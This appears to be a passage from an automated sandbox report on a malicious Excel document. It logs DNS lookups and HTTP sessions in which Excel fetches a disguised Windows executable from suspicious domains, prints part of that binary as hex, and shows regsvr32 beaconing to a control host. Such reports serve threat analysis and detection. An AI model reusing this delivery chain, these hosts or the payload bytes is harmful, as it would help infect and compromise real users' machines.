                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.291413069 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.291472912 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.292234898 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.292267084 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.292287111 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.292356014 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.293082952 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.293114901 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.293135881 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.293206930 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.293981075 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.294017076 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.295362949 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.295406103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.500611067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.620697975 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.659501076 CEST8049171104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.659626961 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.660301924 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.698905945 CEST8049171104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:57.236242056 CEST8049171104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:57.236459970 CEST8049171104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:57.236563921 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:50:00.291042089 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:50:00.291295052 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.090585947 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.090845108 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.091068983 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.133445024 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.133482933 CEST8049169172.67.146.88192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.133532047 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.133569002 CEST4916980192.168.2.22172.67.146.88
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.133833885 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:51:53.134059906 CEST4916780192.168.2.22172.67.198.51

                                                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.170819044 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.232239962 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.641556025 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.703377008 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.870624065 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.931377888 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.911662102 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.969017982 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.991873026 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:55.040765047 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.469363928 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.538844109 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.548119068 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.618860006 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.170819044 CEST192.168.2.228.8.8.80x8c10Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.641556025 CEST192.168.2.228.8.8.80x644cStandard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.870624065 CEST192.168.2.228.8.8.80xd372Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.911662102 CEST192.168.2.228.8.8.80x26aeStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.991873026 CEST192.168.2.228.8.8.80x8766Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.469363928 CEST192.168.2.228.8.8.80x63f2Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.548119068 CEST192.168.2.228.8.8.80x96ceStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.232239962 CEST8.8.8.8192.168.2.220x8c10No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.232239962 CEST8.8.8.8192.168.2.220x8c10No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.703377008 CEST8.8.8.8192.168.2.220x644cNo error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.703377008 CEST8.8.8.8192.168.2.220x644cNo error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.931377888 CEST8.8.8.8192.168.2.220xd372No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.931377888 CEST8.8.8.8192.168.2.220xd372No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.969017982 CEST8.8.8.8192.168.2.220x26aeNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.969017982 CEST8.8.8.8192.168.2.220x26aeNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.969017982 CEST8.8.8.8192.168.2.220x26aeNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:55.040765047 CEST8.8.8.8192.168.2.220x8766No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:55.040765047 CEST8.8.8.8192.168.2.220x8766No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:55.040765047 CEST8.8.8.8192.168.2.220x8766No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.538844109 CEST8.8.8.8192.168.2.220x63f2No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.538844109 CEST8.8.8.8192.168.2.220x63f2No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.618860006 CEST8.8.8.8192.168.2.220x96ceNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.618860006 CEST8.8.8.8192.168.2.220x96ceNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                    • thousandsyears.download
                                                                                                                                                                                                                                                                    • voopeople.fun
                                                                                                                                                                                                                                                                    • uppercilio.fun
                                                                                                                                                                                                                                                                    • astrocycle.download

                                                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    0192.168.2.2249167172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.282797098 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                                                    Host: thousandsyears.download
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.625552893 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Tue, 06 Jul 2021 15:49:53 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 6802
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jYU9ErDF6o9i7wTbXhhJXzj4nJ9qQhb1QEIw4hIFXEFT2R4LgB0AnvbF0ckBqLSLMuiqW4j8fFEUSj4psW%2FWzRQIWeJ5BkRRsGSqzhGWcF1TpAt1iSBKrgJ3DonobShkyd%2Feh%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 66a9fc50381e4e3d-FRA
                                                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 14
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.625590086 CEST1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    1192.168.2.2249168172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.745779037 CEST2OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                                                    Host: voopeople.fun
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810208082 CEST3INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Tue, 06 Jul 2021 15:49:53 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                    Content-Length: 57856
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 6801
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BDNChGJ59YNjBFqZa4TKC4pQsxnL7NdGF%2B60x6I5VvFXRTOmismddTlrNVyVond1jowHhLHRmejjuZTFiFP3ft4aoDN5DaqrJgjCHBHKwv4qBt4fxYB8wmsYcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 66a9fc531afd2c22-FRA
                                                                                                                                                                                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810242891 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                    Data Ascii: @@
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810266972 CEST6INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                                                                                                    Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810290098 CEST8INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                                                                                    Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810312986 CEST9INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                                                                                                    Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810337067 CEST10INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                                                                                                    Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810358047 CEST12INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                                                                                                    Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810383081 CEST13INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                                                                                    Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810405016 CEST14INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                                                                                    Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810426950 CEST16INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                                                                                    Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.810961008 CEST17INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                                                                                    Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    2192.168.2.2249169172.67.146.8880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:53.972748041 CEST64OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                                                    Host: uppercilio.fun
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.050466061 CEST65INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Tue, 06 Jul 2021 15:49:54 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 6802
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7E1Qp76m%2Fht05NPBB9oV%2BTmOx%2BkQk8ceFNdMA5Ouj%2BzOBFAyElgjmkMCqDz97c%2BGdxm2R2UH7bnz0WUwpzxBLyfCY0fHq9cp8Mu6jK1DfJIhjGS5Wlx0Etq7eig%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 66a9fc54898816ea-FRA
                                                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 14
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:54.050488949 CEST65INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    3192.168.2.2249171104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:56.660301924 CEST323OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Cookie: __gads=3565085024:1:5640:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=373135353735:416C627573:38443943323244313446374646354435; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                                                                    Host: astrocycle.download
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:57.236242056 CEST324INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                    Date: Tue, 06 Jul 2021 15:49:57 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Xf2IDfcLQCVH1rz6byqCytHzvmEvCgcaCZRg%2F9gUSLGEhZx6kGlSL%2BnZB0MJnL3Kz5tZUf2obw5UnExmwPSZFk8Kddx%2FnyTc43EeLUX3kCfMGteS4IxdgGxjDeCGf2BD7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
